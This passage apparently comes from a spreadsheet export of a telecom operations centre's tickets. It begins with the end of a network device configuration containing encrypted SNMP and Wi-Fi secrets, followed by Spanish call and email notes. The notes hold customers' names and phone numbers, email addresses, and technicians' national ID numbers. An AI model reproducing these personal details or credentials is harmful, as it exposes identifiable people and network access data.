CPU-DEFEND POLICY 1
 PACKET-TYPE ICMP RATE-LIMIT 1024
CPU-DEFEND POLICY ICMP
 PACKET-TYPE ICMP RATE-LIMIT 2048
#
 CPU-DEFEND-POLICY ICMP
#
 INFO-CENTER TIMESTAMP LOG FORMAT-DATE
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB0360F18ACB276B
 SNMP-AGENT COMMUNITY READ %^%#E|ZZ~MS\:-'W1QB'BYDJ9A$]WKQ^&amp;4BQ~5WFN3U@9\{$$EX2\T:B'SQ`*D+7"P&amp;#=&lt;7~*#H&gt;B42LLQ:D%^%# ACL 2988
 SNMP-AGENT SYS-INFO CONTACT CNOC
 SNMP-AGENT SYS-INFO VERSION V2C
 SNMP-AGENT
#
 STELNET SERVER ENABLE
 TELNET SERVER ENABLE
#
 SET WEB LOGIN-STYLE SIMPLE
 HTTP SECURE-SERVER SSL-POLICY DEFAULT_POLICY
 HTTP SERVER ENABLE
 HTTP SECURE-SERVER ENABLE
 HTTP SERVER PERMIT INTERFACE VLANIF1
#
IP ROUTE-STATIC 0.0.0.0 0.0.0.0 192.168.196.129
IP ROUTE-STATIC 10.10.4.0 255.255.255.0 192.168.196.129 DESCRIPTION SNMP
#
FIB REGULARLY-REFRESH DISABLE
#
USER-INTERFACE CON 0
 AUTHENTICATION-MODE AAA
 IDLE-TIMEOUT 5 5
 SCREEN-LENGTH 0
USER-INTERFACE VTY 0 4
 ACL 3999 INBOUND
 AUTHENTICATION-MODE AAA
 USER PRIVILEGE LEVEL 15
 IDLE-TIMEOUT 5 5
#
WLAN AC
 TRAFFIC-PROFILE NAME DEFAULT
 SECURITY-PROFILE NAME DEFAULT
 SECURITY-PROFILE NAME DEFAULT-WDS
  SECURITY WPA2 PSK PASS-PHRASE %^%#`7UL3A$FW@1';]@PV-@@H{_5YU];EN}+N_X@.(/L%^%# AES
 SSID-PROFILE NAME DEFAULT
 VAP-PROFILE NAME DEFAULT
 WDS-PROFILE NAME DEFAULT
 REGULATORY-DOMAIN-PROFILE NAME DEFAULT
 AIR-SCAN-PROFILE NAME DEFAULT
 RRM-PROFILE NAME DEFAULT
 RADIO-2G-PROFILE NAME DEFAULT
 RADIO-5G-PROFILE NAME DEFAULT
 WIDS-SPOOF-PROFILE NAME DEFAULT
 WIDS-PROFILE NAME DEFAULT
 AP-SYSTEM-PROFILE NAME DEFAULT
 PORT-LINK-PROFILE NAME DEFAULT
 WIRED-PORT-PROFILE NAME DEFAULT
 AP-GROUP NAME DEFAULT
#
DOT1X-ACCESS-PROFILE NAME DOT1X_ACCESS_PROFILE
#
MAC-ACCESS-PROFILE NAME MAC_ACCESS_PROFILE
#
OPS
#
AUTOSTART
#
SECELOG
#
RETURN
&lt;DISTRIBUIDORA_DEL_CARIBE_MIXCO_20MB&gt;PING -A 190.143.218.177 8.8.8.8
  PING 8.8.8.8: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=1 TTL=112 TIME=50 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=2 TTL=112 TIME=49 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=3 TTL=112 TIME=49 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=4 TTL=112 TIME=49 MS
    REPLY FROM 8.8.8.8: BYTES=56 SEQUENCE=5 TTL=112 TIME=49 MS
  --- 8.8.8.8 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 49/49/50 MS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RICARDO MORALES AL  57516318 NO RESPONDE || SE INTENTARA LUEGO**
-ID 3001319447 - 3001319982
**</t>
  </si>
  <si>
    <t>F4624099</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AUXILIADORA  AL  88100360  SE BRINDA RETROALIMENTACION A CLIENTE **
-ID 3001296867
**</t>
  </si>
  <si>
    <t>F4624102</t>
  </si>
  <si>
    <t>####SE VALIDA CON CLIENTE CRISTEL ALVAREZ  EL ENLACE EN LA LLAMADA CON TECNICO ##
3001309843
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 88290803
NÚMERO: 88290803
DURACIÓN: 0:06:47
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 88290803
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 1/07/2022 10:48:02</t>
  </si>
  <si>
    <t>F4624104</t>
  </si>
  <si>
    <t>CLIENTE JOSUE GOMEZ 30192374/ 36773961 INDICA QUE ALGUNAS EXTENSIONES NO SACAN NI RECIBEN LLAMADAS SEÑAL. PROBARON CONECTAR LOS TELÉFONOS A OTRO PUNTO Y SÍ FUNCIONAN, POR LO QUE SE LE INDICA AL CLIENTE QUE DEBE REVISAR EL CABLEADO INTERNO O AVOCARSE CON SU PROVEEDOR DE LA PBX, YA QUE EL E1 SE ENCUENTRA ACTIVO Y CLARO NO BRINDA SOPORTE POR EL CABLEADO INTERNO. ID DE LLAMADA: 3001280663</t>
  </si>
  <si>
    <t>F4624107</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS ARAUZ 83329895 MENCIONA QUE PERSISTE EL INCONVENIENTE
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001272770</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS ARAUZ 83329895 MENCIONA QUE APLICARON REINICIO A LOS EQUIPOS, CLIENTE CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001409790</t>
  </si>
  <si>
    <t>F4624108</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROBERTO MOLINA AL 55168827 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001285482
**</t>
  </si>
  <si>
    <t>F4624115</t>
  </si>
  <si>
    <t>SE LLAMA A LA AGENCIA, INDICA QUE ELDER QUE AGENCIA CERRO OPERACIONES.
3001998360
COLA:
NOMBRE: A: 23386801
NÚMERO: 22282801
DURACIÓN: 0:02:07
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 22282801
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 5/07/2022 17:23:46</t>
  </si>
  <si>
    <t>SE LLAMA AL NUMERO DE EXT 69120  ATIENDE ELMER QUIEN INDICA QUE LA AGENCIA SE ENCUENTRA CERRADA DEBIDO A ASUETO, POR LO QUE SOLICITA QUE SE LLAME EL DÍA DE MAÑANA
3001730532
COLA:
NOMBRE: A: 23386801
NÚMERO: 22282801
DURACIÓN: 0:01:48
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 22282801
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 4/07/2022 12:28:53</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE EXT. 69120 ATIENDE VICTOR QUIEN BRINDA EL NÚMERO TELEFONICO DE LA AGENCIA, COMENTA QUE EN DICHA AGENCIA CIERRAN HOY SABADO A LA 1PM POR LO QUE SE DEBERÁ LLAMAR EL DÍA LUNES EN HORARIO HABIL.
3001538301
COLA:
NOMBRE: A: 23386801
NÚMERO: 22282801
DURACIÓN: 0:02:02
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 22282801
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 2/07/2022 14:53:16</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA QUE CONFIRME CIERRE DE AGENCIA
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MARTES, 5 DE JULIO DE 2022 18:27PARA: CCTELECOMUNICACIONES@GTC.COM.GT &lt;CCTELECOMUNICACIONES@GTC.COM.GT&gt;; JFUENTES@GTC.COM.GT &lt;JFUENTES@GTC.COM.GT&gt;; CROMERO@GTC.COM.GT &lt;CROMERO@GTC.COM.GT&gt;; DENIS SICA &lt;DSICA@GTC.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARAMADO PARA CLIENTE "CC_GYT_GT_INTERNET_AGENCIA_650"
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO SOLICITAMOS SU APOYO PARA INDICAR ESTADO DE LA AGENCIA "CC_GYT_GT_INTERNET_AGENCIA_650" CON ID PRINCIPAL "7800829T", SE HA LOGRADO COMUNICACIÓN CON PERSONAL DE GYT LOS CUALES INDICAN QUE AGENCIA HA CERRADO OPERACIONES POR LO CUAL SOLICITAMOS SU CONFIRMACIÓN POR ESTA VÍA ESTO PARA REALIZAR EL BLOQUEO DEL MONITOREO PROACTIVO DE CLARO, SE ADJUNTAN DATOS DE LA AGENCIA.
TICKET: F4624115
ID: 7800829T
IDENTIFICADOR DEL CLIENTE:  CC_GYT_GT_INTERNET_AGENCIA_650
UBICADO EN:  INTERNET_DIAGONAL 3 CALZADA ATANASIO TZUL 17-13 ZONA 12 CENTRO COMERCIAL PLAZA MADERO ATANASIO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4624117</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELYN RAMIREZ RAMOS  30323193  MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001290813</t>
  </si>
  <si>
    <t>F4624123</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA ENLACE EN MONITOREO PARA LAS 17:00 HORAS A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>F4624128</t>
  </si>
  <si>
    <t>F4624130</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. GERARDO PEÑA 50625434852   PARA PROPORCIONAR AVANCES PERO CONTESTA SRTA QUE EL NUMERO ESTA EQUIVOCADO.</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE SR.  ELIECER BADILLA 5067003-9442 SOLICITA LA VISITA PARA MAÑANA SABADO A LA  1PM, SE LLAMA A UFINET Y SE LES CONFIRMA LA VISITA PARA EL DÍA DE MAÑANA CONFIRMAN DE ENTERADO.
SE ENVIA CORREO A CLIENTE Y UFINET, VISITA PARA MAÑANA SABADO 1PM.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. GERARDO PEÑA 50625434862 NO SE LOGRO COMUNICACION ...</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. MARIO SANCHEZ 50688256166  PERO TAMPOCO SE LOGRA COMUNICACION ...</t>
  </si>
  <si>
    <t>SE LOGRO COMUNICACION CON SR. MARIO SANCHEZ 50688256166 CONFIRMA DE ENTERADO DE LOS AVANCES, ADICIONAL SE ENVIO CORREO...
ASUNTO: REVISIÓN DE ENLACE CONTR0001831499OC || DERIVADOS DE MAIZ ALIMENTICIO S.A.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. CARLOS VALVERDE 88406310 INFORMA QUE YA VALIDARON LOS EQUIPOS Y ESTAN ENCENDIDOS, DESCARTARON QUE ESTEN INHIBIDOS, SE ENVIA CORREO PARA QUE NOS PROPORCIONE LOS DATOS SOLICITADOS POR UFINET...</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE SR. CARLOS VALVERDE, SE REENVIA A UFINET PARA QUE MOVILICE Y COORDINE PERSONAL TECNICO CON CLIENTE, A LA ESPERA QUE CLIENTE CONFIRMA LA VISITA YA QUE HOY SE RETIRAN A LAS 2PM.
ASUNTO: SEGUIMIENTO:  TIK-180300-V1T1¿|  CRCRCLA10044050C-CLARO CR TELECOMUNICACIONES S.A.-CAÍDA TOTAL UFINET:0843299</t>
  </si>
  <si>
    <t>F4624131</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROSA MENESES 86478066 MENCIONA QUE PRESENTAN PROBLEMAS CON LA PAGINA INM.GOB.HN
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001285422</t>
  </si>
  <si>
    <t>F4624132</t>
  </si>
  <si>
    <t>F4624134</t>
  </si>
  <si>
    <t>F4624136</t>
  </si>
  <si>
    <t>SE LLAMMA A CLIENTE ALEJANDRO PUERTO-31750625  ## SE TIENE EN LINEA
3001283248
COLA:
NOMBRE: A: 0050431750625
NÚMERO: 0050431750625
DURACIÓN: 0:00:38
ESTADO: CONECTADA
DETALLES: 0050431750625
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 1/07/2022 09:32:18</t>
  </si>
  <si>
    <t>## A SOLICITUD DE LIDER JUAN MANUEL ## SE LLAMA A CLIENTE ALEJANDRO PUERTO-31750625 ## CLIENTE NO CONTESTA ##ENVIA DIRECTO A BUZON ## SE HAN LLAMADO 2 VECES ##VIVO ##SE INTENTARA NUEVEMANTE EN BREVE</t>
  </si>
  <si>
    <t>F4624149</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PABLO FUNES AL 58589209 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001295029
**</t>
  </si>
  <si>
    <t>F4624154</t>
  </si>
  <si>
    <t>###VALIDA EL SERVICIO CLIENTE BERNERD GOMEZ PARA EL CIERRE DE TICKET##
3001342175
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 54605044
NÚMERO: 54605044
DURACIÓN: 0:04:22
ESTADO: ACD - ASIGNADO A: VELDIN.PALENCIA
DETALLES: 54605044
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 1/07/2022 12:25:41</t>
  </si>
  <si>
    <t>###SE MANDA CORREO AL CLIENTE PARA GESTIONAR PERMISOS ##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: VIERNES, 1 DE JULIO DE 2022 10:30
PARA: BGOMEZ@CONTINENTALMOTORES.COM &lt;BGOMEZ@CONTINENTALMOTORES.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 823900002T CONTINENTAL KOLLISION, S.A |REDUNDANCIA_INTERNET_2 CALLE 0-08 ZONA 1 VILLA NUEVA GUATEMALA VILLA NUEVA 14.529529, -90.595522
BUEN DÍA ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 823900002T CONTINENTAL KOLLISION, S.A   |REDUNDANCIA_INTERNET_2 CALLE 0-08 ZONA 1 VILLA NUEVA GUATEMALA VILLA NUEVA 14.529529, -90.595522
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
EDGAR DANIEL GOMEZ MENDEZ                                   589058          1628 97243 1401
DANIEL ENRIQUE MONTENEGRO CARACUN                 659473          2414 54425 010
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4624168</t>
  </si>
  <si>
    <t>CONPAÑEROS DE CCR SU APOYO || CLIENTE CONFIRMA VISITA LOS ACCESOS
GESTION DE ACCESOS F4624168 | 1664197OH |COOP DE AHO Y CREDITO CEIBEÑA ROATAN |CENTRO COMERCIAL MEGAPLAZA ROATAN
GEYSEL ELIZABETH MALDONADO ANDRADE &lt;GEYSELMALDONADO@COOPERATIVACEIBENA.HN&gt;
GRACIAS, INFORMAREMOS DE SU LLEGADA</t>
  </si>
  <si>
    <t>SE ENVIA  CORREO DE ACCESOS
GESTION DE ACCESOS F4624168 | 1664197OH |COOP DE AHO Y CREDITO CEIBEÑA ROATAN |CENTRO COMERCIAL MEGAPLAZA ROATAN
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:GEYSEL ELIZABETH MALDONADO ANDRADE &lt;GEYSELMALDONADO@COOPERATIVACEIBENA.HN&gt;
CC:GRUPO N1;CNOCCA
VIE 01/07/2022 12:44
BUEN DÍA ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO F4624168 | 1664197OH |COOP DE AHO Y CREDITO CEIBEÑA ROATAN |CENTRO COMERCIAL MEGAPLAZA ROATAN
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICO:
NOMBRE                                                                      IDENTIFICACION
JORGE DAVID ESPINOZA GUILLEN                                             0502-1999-00986
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO ACCESOS PARA PERSONAL DE PLEX || PENDIENTE CONFIRMEN
ASUNTO: GESTION DE ACCESOS F4624168 | 1664197OH |COOP DE AHO Y CREDITO CEIBEÑA ROATAN |CENTRO COMERCIAL MEGAPLAZA ROATAN
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS.
EN SEGUIMIENTO AL SERVICIO REPORTADO 1664197OH || UBICADO: CENTRO COMERCIAL MEGAPLAZA ROATAN.
LE COMENTO QUE ES NECESARIO QUE NOS PUEDAN APOYAR EN GESTIONAR LOS ACCESOS PARA EL PERSONAL ESPECIALIZADO EN FIBRA ÓPTICA QUE SE ESTARÁ ATENDIENDO VISITA.
ADJUNTO LOS DATOS DEL PERSONAL ASIGNADO.
DIERY JONAN CUEVAS RIVEN  0902-1999-00166
KEVIN YONATAN SOLIZ RAMIREZ  0506-1995-01125
JUAN ANGEL MEZA 1006-1991-00093
YOHNNY ELIN VELASQUEZ EBANKS 1104-1999-00161
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4624174</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDNA MAYORGA 66356110 SE TRANSFIERE LA LLAMADA CON GESTOR
-ID 3001314704</t>
  </si>
  <si>
    <t>F4624178</t>
  </si>
  <si>
    <t>CRONOS ANTERIORES INDICAN COORDINADA LA VISITA TÉCNICA PARA EL JUEVES 07 DE JULIO, EN ESPERA QUE CLIENTE CONFIRME HORA CONCRETA.
ASUNTO: INC000003773969 / SD1136151 / NUEVO SD1140345</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 5 DE JULIO DE 2022 8:17
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; SMC RECOVERY AMERICAS BUSINESS SOLUTIONS &lt;SMC.RECOVERY.AMERICAS.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; EVELIN MELISA MEJIA GARCIA &lt;EVELINM.MEJIA@CLARO.COM.GT&gt;; SMC ADVANCED OPERATION AMERICAS BUSINESS SOLUTIONS &lt;SMC.ADVANCEDOPERATION.AMERICAS.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; DIEGO PABLO AJIN HERNANDEZ &lt;DIEGO.AJIN@CLARO.COM.GT&gt;
CC: INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; HUGO KEVIN ANDERSON AC &lt;HUGO.ANDERSON@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; WAGNER JOSUE POLANCO SANDOVAL &lt;WAGNER.POLANCO@CLARO.COM.GT&gt;
ASUNTO: RE: INC000003773969 / SD1136151 / NUEVO SD1140345
*-*-*-*</t>
  </si>
  <si>
    <t>F4624179</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LELY LOPEZ 54992269 MENCIONA QUE APLICARON REINICIO A LOS EQUIPOS,  CLIENTE INDICA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001317085</t>
  </si>
  <si>
    <t>F4624190</t>
  </si>
  <si>
    <t>SE REALIZAN DESCARTES CON CLIENTE EN PR REINCIA ANTENA PERO SIGUE DOWN CLIENTE SOLICITA QUE SE VERIFIQUE EL EQUIPO EN INSTALACIONES</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE SOLICITANDO ACCESOS PARA VISITA DOMINGO A LAS 8:30 AM A SOLICITUD DE CLIENTE FRANKLIN ORELLANA || PENDIENTE CONFIRMACION
ASUNTO: SOLICITUD ACCESOS AGENCIA_0824 8902004T || BANCO DE DESARROLLO RURAL, S.A. || SANTA MARIA CHIQUIMULA ZONA 1
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS BANRURAL.
EN SEGUIMIENTO AL SERVICIO REPORTADO AGENCIA_0824 8902004T || BANCO DE DESARROLLO RURAL, S.A. || SANTA MARIA CHIQUIMULA ZONA 1 CENTRO FRENTE AL EDIFICIO DE LA MUNICIPALIDAD.
SEGÚN LO HABLADO CON EL SR. FRANKLIN ORELLANA SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR LOS ACCESOS PARA EL PERSONAL TÉCNICO QUE ATENDERÁ LA VISITA PARA EL DÍA DOMINGO 03/07 A PARTIR DE LAS 8:30 HRS.</t>
  </si>
  <si>
    <t>F4624193</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE HUMBERTO TOC 50180282  PARA BRINDAR RETROALIMENTACION
-ID 3001322441</t>
  </si>
  <si>
    <t>F4624195</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLAUDIA ZAPATA AL 88649289 INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO SOLICITA QUE SE LE LLAME A LAS 14:00 HRS NUEVAMENTE YA QUE LE HA ESTADO DANDO MUCHO PROBLEMA**
-ID 3001309536
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GEORGINA   AL 77714534 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001309244
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA ZAPATA 88649289 MENCIONA QUE EL INCONVENIENTE PERSITE PERO CLIENTE CORTA LA LLAMADA
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001274018</t>
  </si>
  <si>
    <t>F4624197</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GEORGINA  / 77714534 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001326115</t>
  </si>
  <si>
    <t>F4624198</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 24207200 	EXT. 2345 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001303052</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 24207200 EXT. 2345 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001327020</t>
  </si>
  <si>
    <t>F4624226</t>
  </si>
  <si>
    <t>SE DEBERÁ CONTACTAR AL CLIENTE EL DÍA LUNES EN HORARIO HABIL, PARA SOLICITAR INFORMACIÓN Y PODER COORDINAR VISITA TÉCNICA.</t>
  </si>
  <si>
    <t>|| SE ENVÍA CORREO A CLIENTE SOLICITANDO ACCESOS PARA VISITA TÉCNICA || PENDIENTE CONFIRMEN
ASUNTO: VISITA TÉCNICA AGE118 || ID: 8902524T || BOULEVARD LIBERACION 6-55 ZONA 9 C.C. PASEO LIBERACION.
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS BANRURAL.
EN SEGUIMIENTO AL SERVICIO AGE118 || ID: 8902524T || REDUNDANCIA WIMAX_AGENCIA 118 BOULEVARD LIBERACION 6-55 ZONA 9 LOCALES 10 Y 11 C.C. PASEO LIBERACION.
SOLICITAMOS QUE NOS PUEDAN APOYAR EN GESTIONAR ACCESOS PARA EL INGRESO A LA AGENCIA Y AL CENTRO COMERCIAL PARA EL PERSONAL TÉCNICO ASIGNADO A VISITA.</t>
  </si>
  <si>
    <t>F4624229</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANDREA MONTENEGRO AL 42147113 INDICA QUE ESTA MUY  INESTABLE EL SERVICIO QUE CADA RATOS SE CAE LA CONEXION || SE NOTIFICA  GESTOR **
-ID 3001320532
**</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DEL CLIENTE ANDREA ID: 3001364667, CL COMENTA QUE EN ESTE MOMENTO SE ENCUENTRA SIN CONEXION, HACE LA ACLARACION QUE EL SERVICIO TIENE DEMASIADAS CAIDAS, SE SOLICITA APOYO CON  MIGUELAN.RODRIGUEZ VIA TEAMS | CIC, ENVIA A BUZON, SE SOLICITA APOYO A EXT 8126, ENVIAN A BUZON, SE ESCALA CON KEVIN FONSECA ID:3001366529 | SE DEJA EN CONFERENCIA CON
MIGUELAN.RODRIGUEZ PARA PRUEBAS PENDIENTES | WIP</t>
  </si>
  <si>
    <t>F4624249</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA QUE CONFIRME LAS PRUEBAS DE PRIMER NIVEL Y DATOS DE VISITA
 DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 1 DE JULIO DE 2022 11:45
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; RICARDO PEREZ MENDOZA &lt;RIPEREZ@ELEKTRA.COM.MX&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; MARCO ANTONIO HERNANDEZ RUEDA &lt;MAHERNANDEZ@BANCOAZTECA.COM.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;
CC: CENTRO DE ATENCION DE ENLACES &lt;CAE@AZTECASERVICIOS.COM&gt;; MIGUEL RUIZ GONZALEZ &lt;MRUIZ@ELEKTRA.COM.MX&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;
ASUNTO: RE: 5004 ITALIKA LA LIBERTAD || ID 1036869 || ENLACE INACTIVO PARA BANCO AZTECA
BUEN DÍA
  EN SEGUIMIENTO AL CASO SOLICITAMOS NOS PUEDA CONFIRMAR SI REALIZARON LAS PRUEBAS DE PRIMER NIVEL CON PUNTO REMOTO (TEMA DE ENERGÍA Y REINICIOS A LOS EQUIPOS).
SI YA REALIZARON ESAS PRUEBAS POR FAVOR CONFIRMARNOS LOS SIGUIENTES DATOS:
DIRECCION EXACTA:
CONTACTO EN SITIO:
HORARIO DE ATENCION:
GESTIÓN DE PERMISOS:
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4624255</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SANDRA DUARTE AL 53063000 NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO**
-ID 3001375191
**</t>
  </si>
  <si>
    <t>SE LLAMA A LCIENTE EUGENIO 46403641 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001331993</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SANDRA DUARTE AL 53063000 CONTESTA UN SEÑOR QUIEN NO QUISO DAR SU NOMBRE SOLO INDICA QUE ES JEFE DE SANDRA INDICA QUE VERIFICARA EL SERVICIO Y QUE SE LE LLAME EN 5 MIN**
ID 3001353931
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EUGENIO 46403641 INDICA QUE ES NUMERO EQUIVOCADO QUE NO SABE NADA  **
-ID 3001352274
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EUGENIO 46403641 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001338494</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SANDRA DUARTE AL 53063000 NO RESPONDE || ENVIA A BUZON SE INTENTARA LUEGO**
-ID 3001366981
**</t>
  </si>
  <si>
    <t>F4624257</t>
  </si>
  <si>
    <t>SE NOTIFICA ALARMA EN EL MONITI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624257
ID:  245700255T
IDENTIFICADOR DEL CLIENTE:  CC_FUND_GENESIS_GT_LIVINGSTON
UBICADO EN:  BARRIO EL CENTRO LIVINGSTON IZABAL COLINDANDO 6TA CALLE DE LIVINGSTON AL NORTE, AL SUR AURA LAM GUEV
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4624277</t>
  </si>
  <si>
